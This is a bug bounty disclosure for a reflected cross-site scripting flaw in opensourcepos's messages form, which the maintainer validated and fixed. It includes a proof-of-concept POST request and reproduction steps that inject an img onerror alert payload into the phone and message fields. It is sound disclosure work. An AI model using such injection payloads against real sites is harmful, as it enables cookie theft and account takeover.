Cross-site Scripting (XSS) - Reflected in opensourcepos/opensourcepos

Valid

Reported on

Sep 26th 2021


Description

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites

Proof of Concept

// PoC POST Request:

https://demo.opensourcepos.org/messages/send/

**Data:


-----------------------------154649713830222785181286818375
Content-Disposition: form-data; name="csrf_ospos_v3"

1777de6e2b0d2a6675dff04122423523
-----------------------------154649713830222785181286818375
Content-Disposition: form-data; name="phone"

xss"><img src=x onerror=alert(5)>
-----------------------------154649713830222785181286818375
Content-Disposition: form-data; name="message"

xss"><img src=x onerror=alert(5)>
-----------------------------154649713830222785181286818375
Content-Disposition: form-data; name="submit_form"

Senden
-----------------------------154649713830222785181286818375--



Impact

This vulnerability is capable of claiming other users cookie performing other advanced scenarios . Account takeover is possible in this case .

We have contacted a member of the opensourcepos team and are waiting to hear back 2 months ago
We have contacted a member of the opensourcepos team and are waiting to hear back 2 months ago
2 months ago

Maintainer


This POST data is not read or stored from and loads from an empty form when you open the page. How can it then reach another user?

0x9x
2 months ago

Researcher


i know , cuz i didn't mention the full request . BTW you can follow these steps to reproduce the vulnerability .

1- Go to -> https://demo.opensourcepos.org/messages 2- inject "><img src=x onerror=alert(5)> on Phone number input . 3- you will get a message unsuccessfully sent to " injected byload" and you will get the alert

opensourcepos/opensourcepos maintainer validated this vulnerability 2 months ago
0x9x has been awarded the disclosure bounty
The fix bounty is now up for grabs
jekkos confirmed that a fix has been merged on 2b031e 2 months ago
jekkos has been awarded the fix bounty